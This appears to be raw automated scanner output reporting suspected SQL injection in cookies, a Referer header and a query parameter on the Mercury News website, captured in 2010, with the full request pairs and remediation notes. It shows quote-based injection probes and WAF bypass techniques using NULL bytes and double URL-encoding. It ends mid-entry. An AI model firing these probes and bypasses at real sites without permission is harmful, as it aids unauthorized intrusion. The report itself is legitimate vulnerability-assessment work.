GET /ci_16797755?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews%00''; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16797755?source=m ...[SNIP]...
The u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /college-sports/ci_16785433?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B'; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='BCS berth caps turnaround for a team that four years ago was 1-11'><meta name="keywords" co ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16785433?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B''; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/college-sports/ci_16 ...[SNIP]...
The UserType cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserType cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /college-sports/ci_16785923?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser'; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The teams will be making their debut in the BCS championship game when they meet Jan. 10 in ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16785923?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser''; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The teams will be making their debut in the BCS championship game when they meet Jan. 10 in ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /college-sports/ci_16793572 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%00'; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Summary for this story goes here and heres some morej summary if you want to use more ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16793572 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%00''; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/college-sports/ci_16793572?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 07:22:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 07:22:26 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 449
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The __g_c cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_c cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /college-sports/ci_16793572?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0%00'; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Summary for this story goes here and heres some morej summary if you want to use more ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16793572?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0%00''; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Summary for this story goes here and heres some morej summary if you want to use more ...[SNIP]...
The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the fPage cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /college-sports/ci_16793572 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false%2527; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Summary for this story goes here and heres some morej summary if you want to use more ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16793572 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false%2527%2527; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/college-sports/ci_16793572?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 07:22:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 07:22:31 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 449
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /college-sports/ci_16793572?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B'; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Summary for this story goes here and heres some morej summary if you want to use more ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16793572?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B''; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Summary for this story goes here and heres some morej summary if you want to use more ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /college-sports/ci_16793781?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q='
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='But Auburn quarterback Cam Newton is considered the overwhelming favorite'><meta name="keyw ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16793781?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=''
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/college-sports/ci_16 ...[SNIP]...
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_sq cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /college-sports/ci_16793781 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D%2527; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='But Auburn quarterback Cam Newton is considered the overwhelming favorite'><meta name="keyw ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16793781 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D%2527%2527; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/college-sports/ci_16793781?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 07:22:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 07:22:03 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 449
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the source request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
